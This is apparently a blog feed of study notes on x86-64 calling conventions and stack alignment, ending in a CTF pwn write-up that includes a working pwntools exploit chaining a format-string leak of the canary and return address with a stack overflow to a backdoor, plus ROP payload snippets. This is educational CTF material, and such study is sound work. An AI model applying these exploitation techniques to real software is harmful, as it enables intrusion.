1. Look at the instruction where it crashed. If it is something like `movaps XMMWORD PTR [rsp+...], xmm...`.
2. Check the value of `RSP`. If the last digit of the address is not `0` (for example, it is `8`).
3. **Case closed**: this is a 16-byte alignment problem.

---

### Summary Notes

|**State**|**RSP State**|**Notes**|
|---|---|---|
|**Before a standard Call**|Must be aligned (ends in `0`)|Mandatory ABI requirement|
|**After executing Call**|Unaligned (ends in `8`)|Because an 8-byte return address was pushed|
|**Crash after ROP jump**|Usually ends in `8`|Causes SIMD instructions inside `system` to fail|
|**Alignment strategy**|Add one `ret` instruction|Force a shift by 8 bytes to cancel the offset|

**Now you understand why sometimes your payload logic is completely correct, yet you still need to mysteriously add one more `ret` to make it work, right?** Do you want to look at an actual piece of assembly code that causes this kind of crash for this alignment issue, or are you already ready to talk about the “ultimate trick” involving `printf` variadic arguments and registers?</content:encoded></item><item><title>The &quot;Design Trick&quot; Behind Pushing Parameters Onto the Stack from Right to Left</title><link>https://goosequill.erina.top/en/blog/202603055950/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/202603055950/</guid><description>Import notes on the &quot;Design Trick&quot; Behind Pushing Parameters Onto the Stack from Right to Left</description><pubDate>Thu, 05 Mar 2026 02:59:00 GMT</pubDate><content:encoded>##  The &quot;Design Trick&quot; Behind Pushing Parameters Onto the Stack from Right to Left

This is a brilliantly clever little &quot;trick&quot; in low-level computer design. We are used to reading from left to right, but the CPU insists on pushing arguments onto the stack from right to left. This is entirely to solve a logical paradox: **If I don&apos;t know how many arguments you have, how am I supposed to find the first one?**

---

## 1. The Core Contradiction: The &quot;Fog&quot; of Variadic Arguments

Imagine the definition of the `printf` function:
```c
int printf(const char *format, ...);
```
Here, `...` means the number of arguments is uncertain. When you call `printf(&quot;%d %f %s&quot;, a, b, c)`, at the very moment the function begins running, it actually does not know whether you passed 3 arguments or 300.
The only thing it **definitely** knows is the first argument — the **format string**.

---

## 2. A Stack Layout Diagram for &quot;Right to Left&quot;
Suppose we pass 3 optional arguments through the stack (for simplicity, ignoring register argument passing for now):
`printf(format, a, b, c)`
If they are pushed in **right-to-left order (c -&gt; b -&gt; a -&gt; format)**, and the stack grows downward (from high addresses to low addresses):

| **Memory Address** | **Stored Content** | **Note** |
| --------- | ---------- | -------------- |
| High address | **c** | Last argument |
|           | **b** |                |
|           | **a** |                |
| Low address (RSP) | **format** | **First argument (known)** |

### Why is this &quot;clever&quot;?
With this layout, no matter how many arguments you pass afterward, `format` is always located at `[RSP]` (or at a fixed position above the return address)

After `printf` enters, the first thing it can do is precisely capture `format`. Then it starts parsing the string: when it sees a `%d`, it knows, &quot;Oh, move 8 bytes toward the higher address and I&apos;ll find an integer&quot;; when it sees a `%s`, it moves again toward the higher address.

---

## 3. Thought Experiment: What If the Stack Were Pushed &quot;Left to Right&quot;?
If the order were **format -&gt; a -&gt; b -&gt; c**:
1. `format` would be pushed first and end up at a high address.
2. `c` would be pushed last and end up at the current stack top, `RSP`.
**Disaster strikes:**
When `printf` begins executing, it looks at `RSP`. At that point, `RSP` points to `c`.
But `printf` has no idea whether the current position is `c` or `b` or `format`, because it does not know how much stuff you pushed in! It **cannot use a fixed offset** to find the most critical `format` string.

&gt; [!TIP]
&gt; 
&gt; **Conclusion:** Pushing the stack &quot;from right to left&quot; ensures that **the first argument stays fixed near the top of the stack**, giving the function the ability to parse the remaining arguments.

---

## 4. What This Design &quot;Gives&quot; to Pwn
For students studying binary security, this design leads directly to a very famous exploitation technique: the **Format String Vulnerability**.
Since `printf` parses the `%` symbols inside `format` and then blindly goes to the stack (or registers) to find data,
- if you input an `%p %p %p %p` as `format`,
- then `printf` will obediently print out data from the stack that it was never supposed to show you in the first place (such as return addresses, canary values, or even function pointers).
This happens because `printf` trusts too much in the &quot;indexing guide&quot; provided by `format`, and the right-to-left stack-pushing rule guarantees that it can always find this &quot;guide.&quot;

---

##  From `r9` to `rdi`, this kind of reverse order:
The short answer is: **for registers themselves, there is indeed no hard physical requirement on the order of `mov`.** As long as, at the exact moment the `call` instruction executes, those 6 registers contain the correct values, the CPU is satisfied.
However, there really are a few **&quot;hidden rules&quot;** and bits of **&quot;engineering aesthetics&quot;** here that you may not know:

---

### 1. Why did I write it in reverse just now? (Mental inertia)
When writing assembly or reading compiler output, you often see the order from `r9` to `rdi` written in reverse, mainly for two reasons:
- **A sense of continuity with the stack**: In the 32-bit era, arguments had to be pushed via `push`, and the stack itself was pushed from right to left. Many veteran programmers or compilers subconsciously preserve this rhythm of &quot;handle the last one first, handle the first one last&quot; when writing 64-bit assembly.
- **Protecting RDI/RSI**: In complex functions, `RDI` and `RSI` (the first and second arguments) are usually the most important ones (for example, they may be the starting address of a string). Placing their `mov` last helps prevent accidentally clobbering already computed `RDI` while preparing other arguments (such as calculating the complex logic for the 5th argument).

---

### 2. The Real Hidden Rule: The &quot;Hidden Boss&quot; of Variadic Arguments (the AL Register)
When you call a variadic function like `printf`, besides those 6 registers, there is one extremely important **hidden rule**:
**You must set the `AL` register (the low 8 bits of RAX).**

- **Rule**: For variadic functions, the `AL` register must store **how many vector registers (XMM registers)** were used to pass floating-point values.
    
- **In practice**: If you&apos;re only printing ordinary integers or strings (with no floating-point values involved), you must execute `xor eax, eax` (that is, make `AL = 0`).
    

**If you forget this step:** the program may not necessarily crash, but in some strict system environments, `printf` may exhibit undefined behavior because it cannot determine the number of floating-point arguments. This is one of the easiest traps to fall into when manually constructing a ROP chain in Pwn challenges.

---

### 3. A Required Course for Pwn Players: Ordering Inside a ROP Chain
Although order does not matter in an ordinary `mov` instruction, in the **ROP (Return-Oriented Programming)** chains you care about most, **order is the lifeline**.
When you pass arguments through a Gadget like `pop rdi; ret`, your arguments are stored on the stack. Since the stack is read according to address growth direction, the **physical order** of your ROP chain must match exactly:
1. The argument corresponding to the first `pop rdi`.
2. The argument corresponding to the second `pop rsi`.

**At this point, you can&apos;t just &quot;write things however you want&quot; — you must arrange your Payload according to the order of the Gadgets you found.**

---

### 4. The &quot;Dependency Trap&quot; Between Registers

Sometimes the order must be fixed because **there are dependencies between registers**.

Look at this example:

Code segment

```
; 错误示例：如果你想让 p1 = p2 + 1
mov edi, esi    ; 此时 esi 还没初始化！
mov esi, 200
```

In this case, you must first `mov esi, 200`, and then `mov edi, esi`. When generating code, the compiler performs **Data Flow Analysis** to ensure that the order of register preparation does not create the awkward situation of &quot;using it before it has been computed.&quot;

---

### Summary: Your Checklist of &quot;Hidden Rules&quot;

1. **Freedom**: For ordinary `mov` argument passing, the order is up to you; writing it in forward order is completely fine.
    
2. **AL finisher move**: When calling functions like `printf`, remember `xor eax, eax` (set `AL` to 0).
    
3. **ROP chain**: When constructing an attack payload on the stack, the order is determined by the layout of Gadgets in memory and cannot be misplaced.
    
4. **16-byte alignment**: This is the biggest hidden rule. Before `call`, the value of `RSP` must be divisible by 16, otherwise floating-point operations involved (even inside `printf`) may trigger an `SIGSEGV` segmentation fault.
    

**Checkpoint:**

With this whole &quot;register seating chart&quot; and its hidden rules, is there anything that still feels not intuitive enough? If this is OK, we can try manually writing a complete assembly Demo that includes `AL` setup and argument preparation to verify it! Or would you like to talk about how that **16-byte alignment** ends up causing so much pain?

--&gt; [[16字节对齐]]</content:encoded></item><item><title>When There Are More Than 6 Parameters, the Memory Stack Is &quot;Forced&quot; Into Use</title><link>https://goosequill.erina.top/en/blog/202603054536/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/202603054536/</guid><description>Import notes for When There Are More Than 6 Parameters, the Memory Stack Is &quot;Forced&quot; Into Use</description><pubDate>Thu, 05 Mar 2026 02:45:00 GMT</pubDate><content:encoded>##  When There Are More Than 6 Parameters, the Memory Stack Is &quot;Forced&quot; Into Use

When a function has more than 6 parameters, the CPU is like a pocket already stuffed full—it no longer has any extra “fast lanes” (registers) to hold new data. At that point, the CPU must rely on its “backup storage”: the **stack**.

In x86-64 Linux (System V ABI), this handling method is called **mixed register-and-stack passing**.

---

## 1. Rule: first 6, then stack

We can think of parameter passing as a priority queue:

1. **The first 6 parameters**: fly “first class” and are stored in `RDI`, `RSI`, `RDX`, `RCX`, `R8`, and `R9` respectively.
    
2. **The 7th and later parameters**: fly “economy class” and are pushed onto the **memory stack** in order.

---

## 2. Deep integration: an on-site experiment with C and assembly

Let’s write a “big function” with 8 parameters and see how the compiler arranges the troops.

### C code

C

```
// 一个有 8 个参数的函数
void complex_func(int a1, int a2, int a3, int a4, int a5, int a6, int a7, int a8) {
    int sum = a7 + a8; // 我们重点看最后两个参数
}

int main() {
    complex_func(1, 2, 3, 4, 5, 6, 7, 8);
    return 0;
}
```

### The caller&apos;s (the `main` function&apos;s) assembly logic

Before calling `complex_func`, the assembly instructions become like this:

Code segment

```
; --- 准备第 7 和 第 8 个参数 (内存栈) ---
push 8                ; 将第 8 个参数压栈
push 7                ; 将第 7 个参数压栈

; --- 准备前 6 个参数 (寄存器) ---
mov r9d, 6            ; a6
mov r8d, 5            ; a5
mov ecx, 4            ; a4
mov edx, 3            ; a3
mov esi, 2            ; a2
mov edi, 1            ; a1

; --- 正式调用 ---
call complex_func
```

---

## 3. Stack frame layout: what do the parameters look like?

After the function is called, the stack-top pointer $RSP$ changes. From inside `complex_func`, if it wants to find the 7th and 8th parameters, it must look them up in memory:

|**Memory address (relative to RSP)**|**Content**|**Note**|
|---|---|---|
|`[rsp + 0x0]`|**Return address**|Return address automatically pushed by the `call` instruction|
|`[rsp + 0x8]`|**7**|7th parameter (a7)|
|`[rsp + 0x10]`|**8**|8th parameter (a8)|

&gt; [!TIP]
&gt; 
&gt; **Why +0x8 and +0x10?** &gt; Because on a 64-bit system, each pushed parameter occupies 8 bytes. The first 8 bytes store the return address after the function finishes, so parameters must be looked up starting at offset 8.

---

## 4. Why is this crucial for learning Pwn?

For students studying binary security, this is core knowledge for building an **ROP (Return-Oriented Programming)** chain:

1. **Differences in parameter locations**: if the vulnerable function you want to use has only 1–2 parameters (such as `system(&quot;/bin/sh&quot;)`), you only need to look for a gadget like `pop rdi; ret`.
    
2. **Exploiting stack overflows**: if the function you want to use has more than 7 parameters (for example, some complex kernel functions), you cannot rely on controlling registers alone—you must also **control the data layout on the stack**, because the program will read its subsequent parameters from places like `[rsp + 8]`.
    

This mixed “register + stack” mechanism is actually the CPU’s balance between **speed (registers)** and **generality (the stack can hold an unlimited number of parameters)**.

---

### Advanced thought

Have you ever wondered why function parameters are pushed onto the stack **“from right to left”** (push 8 first, then 7)? This is actually related to a very famous feature in C: **variadic functions** (such as `printf`). Want to talk about the “design trick” behind this?

--&gt; [[参数从右往左压栈道&quot;设计心机&quot;]]</content:encoded></item><item><title>The “Unwritten Rule” of RDI as the First Argument</title><link>https://goosequill.erina.top/en/blog/202603054245/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/202603054245/</guid><description>Import notes on the “unwritten rule” of RDI as the first argument</description><pubDate>Thu, 05 Mar 2026 02:42:00 GMT</pubDate><content:encoded>##  The “Unwritten Rule” of RDI as the First Argument

This question gets to the core of low-level design. Why is it specifically defined that **RDI** is the first argument and **RSI** is the second? Why not randomly pick two registers instead, such as R8 and R9?

The reasons behind this can mainly be summarized in two points: **the continuation of hardware legacy** and **extreme performance optimization**.

---

## 1. Hardware Legacy: Enabling “Zero-Cost” Calls to System Instructions

In C, the operational logic of many fundamental functions is **“destination $\leftarrow$ source”**. The most typical example is `memcpy(dest, src, size)`.

- **RDI**: the D stands for **Destination**.
    
- **RSI**: the S stands for **Source**.
    

**The brilliance of the design:**

The x86 architecture has some very powerful built-in “string instructions” (such as `movsb`). These instructions are hard-wired into the CPU circuitry, and they **mandate** the use of RSI as the source and RDI as the destination.

If the calling convention (ABI) specifies that the first argument goes into RDI and the second into RSI, then when you write `memcpy(dest, src, n)`:

1. `dest` is already in RDI.
    
2. `src` is already in RSI.
    
3. The CPU **does not need** to spend extra time issuing `mov` instructions to swap register values; it can start copying immediately with a single hardware instruction.
    

**Conclusion:** this design allows high-frequency C functions (such as string processing and memory copying) to connect directly to the CPU’s hardware-accelerated instructions.

---

## 2. Performance Revolution: Evolving from the “Memory Era” to the “Register Era”

In the old 32-bit (x86) era, function arguments were placed on the **stack**.

- **Drawback**: the stack resides in memory, and CPU access to memory is far slower than access to registers. Every function call required writing to memory and reading from memory, which was highly wasteful.
    

By the 64-bit (x86-64) era, more registers became available. Engineers established a set of rules (the System V ABI) that requires the first 6 arguments to be passed through registers.

**Why this particular order?**

It works like a “standard protocol.” Without such a rule:

- Programmer A might write a function assuming the first argument is in RAX.
    
- Programmer B might write code that passes the argument in RBX.
    
- Result: the program crashes immediately.
    

**The purpose of uniformly specifying RDI, RSI, ...** is to ensure that compilers, operating systems, and code written in different languages can **communicate with each other seamlessly**. It is like everyone agreeing to drive on the right side of the road.

---

## 3. Practical Significance: Impact on Pwn and Reverse Engineering

For students learning binary security (Pwn), understanding this is crucial:

- **Finding gadgets**: when constructing a ROP chain, you often need to control the first argument (for example, `system(&quot;/bin/sh&quot;)`). Since you know the rule is RDI, you will specifically look for instruction snippets like `pop rdi; ret`.
    
- **Quickly locating vulnerabilities**: when you see code in a disassembler (such as IDA) passing a strange address into **RDI** and then calling a function, you can immediately realize: “Oh, it is setting up the first argument of that function.”

---

### Summary Comparison Table

|**Dimension**|**Old Era (32-bit/x86)**|**New Era (64-bit/x86-64)**|**Benefits**|
|---|---|---|---|
|**Storage location**|Memory stack (Stack)|**Registers (RDI, RSI...)**|**Fast** (register access is on the nanosecond scale)|
|**Instruction count**|Requires multiple push/pop operations|Simple mov is enough|**Smaller code size** and higher execution efficiency|
|**Logical consistency**|Arbitrary|Strictly follows Dest/Source logic|**Hardware-level optimization**, reducing the cost of data movement|

Would you like to see how the CPU is “forced” to use the memory stack to handle arguments when there are more than 6 of them (and registers are no longer sufficient)?

--&gt; [[参数超过6个时，“被迫”动用内存栈处理]]
--&gt; [[参数从右往左压栈道&quot;设计心机&quot;]]</content:encoded></item><item><title>Index Registers</title><link>https://goosequill.erina.top/en/blog/202603052327/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/202603052327/</guid><description>Import notes on index registers</description><pubDate>Thu, 05 Mar 2026 02:23:00 GMT</pubDate><content:encoded>##  Index Registers

The best way to understand index registers is to imagine them as **a mover&apos;s “GPS coordinates”**.
In the x86-64 architecture, **RSI** and **RDI** are like a pair of partners: one tells the CPU “where the item is” (source), and the other tells it “where to send it” (destination).

---

## 1. Core Logic: Source and Destination
We can quickly build intuition through a simple comparison table:

| **Register** | **Full Name**             | **Core Role**         | **Real-World Analogy** |
| ------- | ------------------------- | ------------------- | ---------------------- |
| **RSI** | **S**ource **I**ndex      | **Source** operand pointer      | The address of the “supply location” |
| **RDI** | **D**estination **I**ndex | **Destination** operand pointer | The address of the “delivery location” |

&gt; [!NOTE]
&gt; 
&gt; **Changes in modern x86-64**: On 64-bit Linux systems (System V AMD64 ABI), RDI and RSI also have an extremely important identity — **function arguments**.
&gt; 
&gt; - **RDI**: stores the **1st** function argument.
&gt;     
&gt; - **RSI**: stores the **2nd** function argument.

---

## 2. Deep Integration: A C and Assembly Side-by-Side Experiment
To help you fully understand, let&apos;s look at one of the most classic scenarios: **memory copy (Memory Copy)**.
### C Code
This code implements a simple character copy function: it copies the character pointed to by `src` to `dest`.
```c
void manual_copy(char *dest, const char *src) {
    *dest = *src; // 把源地址的内容搬到目的地址
}
```
### Corresponding Assembly Code (x86-64)
When you call `manual_copy(buffer, message)`, the compiler arranges the registers like this:
Code segment
```shell
; 假设进入函数时：
; RDI = dest 的地址 (第一个参数)
; RSI = src 的地址  (第二个参数)

manual_copy:
    mov al, [rsi]      ; 【从源头取货】：把 RSI 指向地址里的 1 字节数据读到 AL 寄存器
    mov [rdi], al      ; 【送到目的地】：把 AL 里的数据写到 RDI 指向的地址中
    ret                ; 返回
```

---

## 3. Advanced Usage: String Instructions
They are called “index registers” because x86 specifically designed some “fully automatic” instructions. For example, `movsb` (Move String Byte) automatically uses RSI and RDI.
### Bulk Transfer Example
If we want to move 10 bytes at once:
- **C**: `memcpy(dest, src, 10);`
    
- **Assembly instruction**:
    
    Code segment
```
lea rsi, [src_buffer]   ; RSI = 源缓冲区首地址
lea rdi, [dest_buffer]  ; RDI = 目标缓冲区首地址
mov rcx, 10             ; 计数器设置为 10
rep movsb               ; 【自动搬运】：
                        ; 1. 把 [RSI] 的东西搬到 [RDI]
                        ; 2. RSI++，RDI++ (自动指向下一个字节)
                        ; 3. 重复执行，直到 RCX 为 0
```
Here, the “indexing” nature of RSI and RDI is demonstrated vividly: they are not just addresses, they also **automatically increase as the transfer proceeds**, like conveyor belts in a warehouse moving forward on their own.

---

## 4. Memory Tricks Summary
- **S**I = **S**tart / **S**ource (where it starts / the source)
- **D**I = **D**estination / **D**one (the destination / where it ends)
When doing reverse engineering or debugging, if you see `rep movs` or a large number of `[rsi]` / `[rdi]` operations, your first reaction should be: **“The CPU is doing a big relocation!”**

Do you want to continue and dig deeper into **calling conventions**? In other words, the “unwritten rule” of why RDI is the first argument and RSI is the second argument.   
--&gt; [[RDI作为第一个参数的“潜规则”]]</content:encoded></item><item><title>[Shenyu Cup 2021]find_flag</title><link>https://goosequill.erina.top/en/blog/202512151812/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/202512151812/</guid><description>Import notes for [Shenyu Cup 2021]find_flag</description><pubDate>Mon, 15 Dec 2025 10:12:00 GMT</pubDate><content:encoded>&gt; [!note]
&gt; Related entry: [[PWN题目索引]]

# find_flag - Challenge Write-up

&gt; [!info] Challenge Information
&gt; - **Competition**: Shenyu Cup
&gt; - **Challenge**: find_flag
&gt; - **Difficulty**: ★★★☆☆
&gt; - **Mitigations**: PIE, canary, full protections enabled
&gt; - **Vulnerability Type**: Format string / stack overflow
&gt; - **Exploitation Technique**: ret2text

*Preface:*
This challenge records two points:
	First, it helps me clarify Python data type conversions. Sometimes after leaking data, you still need to convert it into the correct format. Only by mastering Python&apos;s data conversion methods can you adapt flexibly and not ask AI about everything.
	Second, this was my first time solving a PIE challenge, so the method for setting breakpoints is somewhat different.

## Vulnerability Analysis
In this challenge, the format string vulnerability causes an arbitrary address read, which allows us to use the `gets()` function&apos;s stack overflow to reach the backdoor function. You need to look around a bit to find the backdoor function yourself. If that still doesn&apos;t work, `Ctrl + F12` and checking strings through cross-references can also locate it.

## Solution Steps
### ① Static Analysis
![image.png](https://chenhun.oss-cn-beijing.aliyuncs.com/photo/202512151847651.png)
These are all obvious vulnerabilities: overflow into the backdoor function, so the exploitation technique is `ret2text`. But the key point of this challenge is how to overflow without crashing the program and how to find the correct overflow point **(PIE protection)**.
Since the idea is clear, we can move to dynamic debugging and find the offset (offsite).

### ② Dynamic Debugging  
####  format location
About the breakpoint issue:
![image.png](https://chenhun.oss-cn-beijing.aliyuncs.com/photo/202512151856521.png)
One easy-to-remember method is to use `$rebase(偏移)`. This is an advanced feature built into pwndbg, specifically a variable for PIE. You only need to pass the offset address from IDA into that variable.
```txt
start
b *$rebase(0x13BB)
c
```
![image.png](https://chenhun.oss-cn-beijing.aliyuncs.com/photo/202512151901602.png)
```txt
%p..%p..%p..%p..%p..%p..%p..%p..
```
![image.png](https://chenhun.oss-cn-beijing.aliyuncs.com/photo/202512151906110.png)
By simply counting, it appears at the 6th position, so `off_site = 6`
#### canary leak
Next, find the canary&apos;s position on the stack. Emmm, this is such a basic step that I won&apos;t include screenshots; you can tell even from IDA.
```txt
char format[32]; // [rsp+0h] [rbp-60h] BYREF
_BYTE buf_0x40[56]; // [rsp+20h] [rbp-40h] BYREF
unsigned __int64 canary; // [rsp+58h] [rbp-8h]
```
$60h - 8h = 58h \div 8h = 11$ so the canary&apos;s offset is 11 + 6 = 17.
Just try `strat` directly --&gt; `%17$p` and the result is the canary.
#### progrem_base leak
Here, I hope everyone has an equivalent concept in mind:
- **Stack Address** and **Code Address** are two independent memory regions.
- **PIE protection**: randomizes the base address of the code segment (Text Segment).
- **ASLR protection**: usually also randomizes the base address of the stack.

Our RIP pointer now points into the stack, so when searching for the program base address, what we should leak is not the stack frame address, because that is useless for defeating PIE. What we should correctly look for is any address in the `.text` segment! Think about where one is guaranteed to exist. What does the `call` instruction do?
With that line of thinking, you can naturally arrive at leaking the `save_rip` address!

|**Stack Content**|**Offset (relative to RBP)**|**Description**|**Useful for bypassing PIE?**|
|---|---|---|---|
|...|...|Local variable buffer|No|
|**Canary**|`rbp - 0x8`|You already got it|No (only used to bypass Canary)|
|**Saved RBP**|`rbp`|The previous function&apos;s stack base|**No** (this is what you almost leaked just now)|
|**Saved RIP**|`rbp + 0x8`|**Return address**|**Yes! (This is the target)**|

The corresponding offset is easy to calculate: it&apos;s two offsets above the canary: `%19$p`

At this point, only one final problem remains in this challenge-----how to process the leaked data?
#### Data processing
First, let&apos;s look at the format of the leak.
![image.png](https://chenhun.oss-cn-beijing.aliyuncs.com/photo/202512151928368.png)
Here, to split the received characters, we can use the `recvn(count)` function, which can specify the number of characters to receive.
To avoid miscounting, use Python&apos;s `len()` function.
![image.png](https://chenhun.oss-cn-beijing.aliyuncs.com/photo/202512151932450.png)

```python
io.recvn(19)
leak_text = io.recvn(14)
canary = io.recvn(18)
```
Here I use `io = porcess(&apos;./程序&apos;)`

Key point!!!
When doing Pwn challenges, the &quot;**shape transformation**&quot; of data is the most essential basic skill. We usually jump back and forth among three forms:
1. **Integer**: used for arithmetic calculations (for example, `libc_base + system_offset`).
2. **Bytes**: used to send Payloads (for example, `b&apos;\xef\xbe\xad\xde&apos;`).
3. **String/Hex String**: usually the leaked content output by the program (for example, `b&quot;0x7ffff...&quot;`).

What we receive here is a Hex String, so correspondingly it needs to be converted into Bytes.
However, since we have the `p64()` function, here we convert it into the intermediate transition type Integer first.
The process still uses the `int(x,[base])` function, where the optional parameter `base` specifies the base.
### ③ Exploit Development
Next comes the full exp.
```python
from pwn import *
context.log_level = &apos;debug&apos;
# io = remote(&apos;node4.anna.nssctf.cn&apos;,28117)
io = process(&quot;./find_flag&quot;)
print(f&quot;PID = {io.pid}&quot;)
io.sendlineafter(b&apos;What\&apos;s your name? &apos;,b&apos;%19$p%17$p&apos;)
io.recvuntil(b&apos;, &apos;)

save_rip = int(io.recvn(14),16)
canary = int(io.recvn(18),16)
print(save_rip)
print(canary)
progrem_base = save_rip - 0x146F
backdoor = progrem_base + 0x1229
ret = progrem_base + 0x13F8
payload = b&apos;a&apos; * 0x38 + p64(canary)
payload += b&apos;b&apos; *0x8 + p64(ret) +p64(backdoor)
io.recv()
io.sendline(payload)
io.interactive()
```

By the way, this challenge requires stack alignment, so pay attention to line 17.
### ④ Final Exploitation
![image.png](https://chenhun.oss-cn-beijing.aliyuncs.com/photo/202512151946575.png)


## Tools Used
IDA, pwndbg

## Key Takeaways
Data type conversion

---

### Technical Insights
Here I additionally recorded some PIE debugging extensions and data conversion extensions for my future reference in case I forget; they are no longer directly related to this challenge.
#### PIE
##### 1. Use Pwndbg&apos;s dedicated commands (most recommended)
* **`piebase` command**
After the program starts running, directly enter `piebase`, and it will automatically calculate and print the current base address.
Even better, you can include an offset directly in the calculation. For example, if the offset of some function in IDA is `0x1234`, you can enter:
`piebase 0x1234`
It will directly tell you the current real absolute address of that function.
* **`brva` (Break Relative Virtual Address)**
This is the most practical command. You don&apos;t need to know the base address; just set a breakpoint directly using the offset from IDA.
Suppose the offset of the `main` function or some vulnerability point is `0x1145`:
```bash
pwndbg&gt; brva 0x1145
```
Pwndbg will automatically capture the program&apos;s base address, add the offset, and set the breakpoint for you.
* **`breakrva`**

Same as `brva`, this is its full name.
##### 2. Pwntools + GDB integration (most commonly used when scripting)
When writing exploit scripts, we usually use `pwntools`&apos;s `gdb.attach` for debugging. Pwntools is very smart and can recognize PIE.
You can write it directly like this in a Python script:
```python
from pwn import *

context.terminal = [&apos;tmux&apos;, &apos;splitw&apos;, &apos;-h&apos;] # 或者你的终端设置
p = process(&apos;./pwn_binary&apos;)

# 方法 A: 使用 gdbscript
# $rebase 是 pwndbg/gef 识别的宏，代表当前基地址
gdb.attach(p, gdbscript=&apos;&apos;&apos;
    b *$rebase(0x1234) 
    c
&apos;&apos;&apos;)

# 方法 B: 直接用 pwntools 的 ELF 对象 (更优雅)
elf = ELF(&apos;./pwn_binary&apos;)
# context.binary = elf 
# 这种方式结合 gdb.attach 需要配合具体的地址计算，通常不如方法 A 在动调时直观
# 但你可以先算出地址再 attach (如果 PIE 没开或者是用 core dump)

```
**Note:** If you `gdb.attach` immediately after `process()`, sometimes the base address has not been loaded yet. It is usually recommended to first `p.recvuntil(...)` to let the program run a bit before attaching, or put `start` first in the gdbscript.
##### 3. Disable ASLR at the system level (simplest and most brute-force)
If you only want to debug and analyze the logic locally without dealing with changing addresses, you can directly disable ASLR at the system level.
Although PIE is a compile-time option, address randomization depends on the kernel&apos;s ASLR. If ASLR is disabled, PIE programs will usually load at a **fixed base address** (typically something like `0x555555554000`).
**Execute in the Linux terminal:**
```bash
sudo sysctl -w kernel.randomize_va_space=0
```

* **Advantage:** The address is the same every run, so you can set breakpoints directly with absolute addresses.
* **Disadvantage:** It may make you forget that the real exploitation environment has ASLR enabled, causing you to forget to calculate the leaked base address when writing the exp. **Recommended for analyzing program logic only.**

##### 4. How do you view the offset here?
In IDA Pro, make sure you have enabled &quot;Line Prefixes&quot; (Options -&gt; General -&gt; Disassembly -&gt; Line prefixes).
If it is a PIE program, the address displayed by IDA is usually a small value like `0x1234` (an offset relative to the base address `0`). If IDA displays a large number like `0x401234`, you can use `Edit -&gt; Segments -&gt; Rebase program` to set the base address to `0`, so the addresses shown become pure offsets, which is very comfortable to use directly with `brva`.

#### Data Conversion
##### 1. Core killer technique:
Packing &amp; Unpacking. This is by far the most commonly used functionality in Pwn. It solves the problem of &quot;how to turn an integer into its binary form in memory.&quot;
* **`p64()` / `p32()` (Pack)**
* **Function:** convert an integer into a little-endian byte stream.
* **Scenario:** when constructing a Payload, put the calculated address into it.
```python
from pwn import *
# 比如 system 的地址是 0xdeadbeef
payload = p32(0xdeadbeef) 
# 结果: b&apos;\xef\xbe\xad\xde&apos; (自动化处理了字节序)

# 64位同理
payload = p64(0x7ffff7a0d000)

```
* **`u64()` / `u32()` (Unpack)**
* **Function:** convert received **raw byte streams** (not strings like &quot;0x...&quot;) back into integers.
* **Scenario:** when you use `p.recv(8)` to read actual memory address data (garbled-looking characters), and need to convert it into an integer to calculate the base address.

```python
# 假设你收到了 8 字节的 puts 真实地址
leak_data = p.recv(8) 
libc_base = u64(leak_data) - 0x080a30

```
##### 2. Handy tools for handling leak data:
Padding and alignment. In 64-bit programs, memory addresses usually only have 6 effective bytes (for example `0x00007f...`), and the high bytes are `00`. If you directly `recv(6)` and then `u64()`, Python will throw an error, because `u64` must consume all 8 bytes.
* **`ljust()` (Left Justify)**
* **Function:** pad characters on the right side of a byte stream until it reaches the specified length.
* **Scenario:** fix 6-byte leaked data, or pad junk data in stack overflows.


```python
# 场景1：修复 Leak
# 收到 b&apos;\x10\x20\x30\x40\x50\x60&apos; (6字节)
leak = p.recv(6)
# 补齐到 8 字节，用 \x00 填充，然后再转整数
addr = u64(leak.ljust(8, b&apos;\x00&apos;))

# 场景2：栈溢出填充
# 填充 0x20 个 &apos;A&apos;
padding = b&apos;A&apos; * 0x20 
# 或者用 ljust (虽然直接乘更方便)
padding = b&apos;payload_start&apos;.ljust(0x20, b&apos;\x00&apos;)

```
This is actually often used in `ret2libc` techniques to preserve leaked libc addresses.
```python
leaked_puts = u64(io.recvuntil(b&apos;\x7f&apos;)[-6:].ljust(8,b&apos;\x00&apos;))
print(f&quot;linked_puts: {hex(linked_puts)}&quot;)
```
##### 3. Hex and byte streams
Mutual conversion. Sometimes the program does not output raw bytes, but an ASCII string printed through `printf(&quot;%p&quot;)` (such as `b&quot;0x7ff...&quot;`).
* **`int(x, 16)`**
* **Function:** as you already know, handles ASCII-formatted hexadecimal strings.
* **Note:** Python 3&apos;s `int()` can directly accept the `bytes` type, no need to `.decode()` first.

```python
p.recvuntil(b&quot;address: &quot;)
leak_str = p.recvline().strip() # 比如收到 b&apos;0x7ff...&apos;
addr = int(leak_str, 16)

```

* **`unhex()` / `enhex()` (Pwntools)**
* **Function:** handle very long Hex strings.
* **Scenario:** some challenges give you text like `deadbeef...`, and you need to turn it back into `\xde\xad...`.


```python
from pwn import *
data = unhex(&quot;48656c6c6f&quot;) # 变成 b&apos;Hello&apos;

```



#### 4. String search and positioning
When writing automation scripts, you need to precisely locate the position of a leaked address.
* **`find()` / `index()`
* **Function:** find the position of a specific substring within a byte stream.

```python
data = p.recv()
# 假设泄漏的地址前面有 &quot;Leaked: &quot;
start_index = data.find(b&quot;Leaked: &quot;) + len(b&quot;Leaked: &quot;)
leak = data[start_index : start_index + 6]

```


* **`split()`**
* **Function:** split by delimiter.
* **Scenario:** Canary is often hidden in the middle of a pile of output data.
```python
# 假设输出是: &quot;Welcome, user: [CanaryBytes] !&quot;
p.recvuntil(b&quot;user: &quot;)
canary = u64(p.recv(8))

```

#### 5. Ultimate lazy-person tool: `flat()`
If you think manually concatenating Payloads is ugly:
```python
payload = b&apos;A&apos;*40 + p64(pop_rdi) + p64(bin_sh) + p64(system)

```

You can use Pwntools&apos; `flat`:

* **`flat()`**
* **Function:** automatically `pack` the integers in the list, concatenate the strings, and generate the final Payload.


```python
payload = flat([
    b&apos;A&apos; * 40,
    pop_rdi,  # 自动识别为整数并 p64
    bin_sh,
    system
])

```

---

##### Summary

| Scenario | Raw Data (Input) | Target Data (Output) | Recommended Function |
| --- | --- | --- | --- |
| **Constructing a Payload** | `0xdeadbeef` (integer) | `b&apos;\xef\xbe\xad\xde&apos;` (bytes) | `p32()` / `p64()` |
